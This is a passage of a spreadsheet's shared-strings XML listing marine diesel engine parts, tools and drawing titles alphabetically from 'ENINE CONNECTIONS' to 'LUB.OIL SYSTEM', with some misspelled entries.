  <si>
    <t>ENINE CONNECTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EQUAL ELBOW COUPLINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EQUAL TEE COUPLINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.GAS PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.PIPE SYSTEM-DIMENSION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.PIPES-BRACING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.VALVE HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXH.VALVE-COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST GAS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST GAS PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST VALVE HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST VALVE,TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST VALVE-COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXPANSION JOINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTENSION F.DIAL GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRA TOOLS(OPTION)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTOR F.LOWER LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTXNSION F.DIAL GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EYE NUT FOR TURBO ROTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EYE SCREWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FEELER GAUGE SET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIRE EXT.-SCAV.AIR SPACE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIRE EXTING.IN SCAV.BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIRE EXTING.SCAV.A.SPACE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTED BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTED BOLT-SUNDRY HEADS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FITTINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FL.STEEL BARS AND EDGEL PL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE FOR AIR CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE FOR SEALING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,CIRCULAR PLAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,CIRCULAR WITH NECK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,OVAL EDGED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,SQUARE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,SQUARE WITH NECK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE-DISM.-NON RETURN V</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE-RECTANGLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL BAR 100*60</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL BARS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL BARS A.EDGE PL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAT STEEL BAR\EDGE PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLEXIBLE STEEL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLOAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLOW CONTROLLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOOT FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORGED-BENT SCREW SHACKLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORM+POS.TOL.-CYL.FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORM+POS.TOL.-FRAME GIRD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORM+POS.TOL.FRAME GIRD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOTTOM VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX-INTERMEDIATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME CAMSHAFT SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME TOP VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME-FORM AND POS.TOL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESH COOL.WATER PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER COLLING SYST.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER COOLING SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER PIPE-OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER SYST.TREATMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER SYSTEM PREHEATING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER SYSTEM TREATMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRICTION MATERIALS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRICTION-MATERIALS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL AND EXH.GEAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL AND EXHAUST GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL INLET PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PIPES,TRACING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PREHEATING CHART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL SYSTEM,TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP HOUSING COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP ROLLER GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACKET ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALLERY ARRANGEMENT AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALLERY ARRANGEMENT FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALLERY BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALLERY BRACKET AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALLERY BRACKET FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GASKETS.SEALINGS,O-RINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAUGE COCK,FEMALE/FEMALE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAUGE EXH.V.BOTTOM PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUAGE EXH.VALVE SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUAGE,EXH.VALVE SPINDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEN.WELD.SYMBOLS F.PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GENERAL TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GLASS FIBRE CLOTH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GLOW LAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GLUED SEALING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRAPH FOR GOUVERNOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND RING-START.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND,MANDREL-HOLDER INS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND,MANDREL-HOLDER-INS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND,MANDREL-HOLDER-OUTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND.TOOL-EXH.VALVE SEAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND.WHEEL-EXH.VAL.SEAT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING MACHINE-CYL.LINER/COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING MANDREL-VAVLE HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING RING-START.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING TOOL-H.P.PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD FOR COUPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD MADE OF PLATE IRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDANCE VAL.-AUTOMATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDANCE VALUES AUTOMATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE BUSHING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE F.GRINDING MANDREL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE F.REVERSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE NUT F.SPINDLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE RING F.PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE RING FOR PISTON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE SCREW F.SPINDLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE SCREW,PISTON CROWN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE SHOE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE STRIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE-CUT.TOOL-H.P.PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDEBAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HANDLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HANDLE FOR WELDING-ON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HANDLE GRIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HANDLE,DISM.M.BRG SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEATING ELEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEAVY FUEL OPERATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HELICAL SPRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HELICAN SPRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX.HEAD PLUG SCREWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX.SET SCREW W.CUP POINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX.SET.SCREW W.DOG POINT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX.SOCK.L.HEAD CAP SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX.SOCK.L.HEAD CAP SCREWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX.SOCKET HEAD SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX.SOCKET L.HEAD CAP SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX.SOCKET PIUG WITH KRG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON FIT BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON HEAD SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON HEAD SCREWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON NIPPLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON SCREWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON SOCKET PLUGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEXAGON SOCKET SCREWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER FOR SCRAPER RINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER-ATOMIZER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDING DOWN BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOOKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOSE WITH 2 PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOT ROLLED ANGLE PROFILES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOT ROLLED T-PROFILES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING FOR FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING-FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING-STUFFING BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK-CONN.ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK-CROSSHEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK-CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK-MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK-STAYBOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACKS, COMPLETE SET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.PIPE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.PULL TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.TIGHTENING TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.TOOL-COUPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.TOOLS-COUPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC PULL TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IMPACT HANDWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IMPACT SOCKETS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDICATOR VALVE'MAIHAK'</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INNER AND OUTER LINKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSERT LKS FOR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSERT LKV-LKW-LK COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTR.FLAMEHARDN.PIST.ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUC.FOR QUAY TRIALS&amp;SEA TRIALS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION DRAWINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION-STANDARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUMENTATION-STANDARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUMENTATION-STANDARD*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION COVER-REMOVABL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION MATERIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSULATION-FUEL OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERMEDIATE SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERMEDIATE SHAFT MOUNT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>IRON BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK HYDRAULIC(PARTS FOR)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-HYDRAULIC(COMPLETE)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-HYDRAULIC(CYLINDER)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-HYDRAULIC(PISTON)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-HYDRAULIC(SUPPORT)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-MECHANICAL(SUPPORT)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-MECHANICAL(THREAD)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JACK-MECHANICAL(FITTING)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JOURNAL BEARING SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>KEY FOR ADJUSTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>KEY,HEX.SOCKET SCREWS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>KEYS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.O.ST.A.DIST.+GOV.DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.PLATE-COMOLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMELLA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMELLA ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMP COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LAMWELLA COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEAD-IN PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEVER*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LID</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT-TOOL-MAIN BRG.CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL CYL.COVER/LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL F.CYL.LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL F.EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL-CYL.LINER(PART)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.TOOL-ROLL.G.-EXH.VAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING ATTACHMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING ATTACHMENT-COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING ATTACHMENT-CONN.ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING BRACKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING DEVICE-PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING DEVICE-VARIOUS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL F.CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL-ROLL.G.-EXH.VAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING/BASE PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIMIT GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LINER F.SIDE CHOCK,PORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LINER F.SIDECHOCK,STARBRD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LINER FOR SIDE CHOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LINK FOR REVERSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF CAPACITIES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">LIST OF FLANGES </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF STANDARD INSTROMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCK PLATE,SIDECHOCKLINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING DECIVE*</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING PLATE FOR NUTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING PLATE,SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING PLATE-RECTANGULAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING PLATE-SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING PLATES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING WASHERS FOR NUTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB OIL BOTTOM TANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB OIL OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.&amp;COOL.OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.AND COOL.OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.AND COOLING OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.AND COOL OIL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE.OUT-CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL SYST.CLEAN.INSTR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
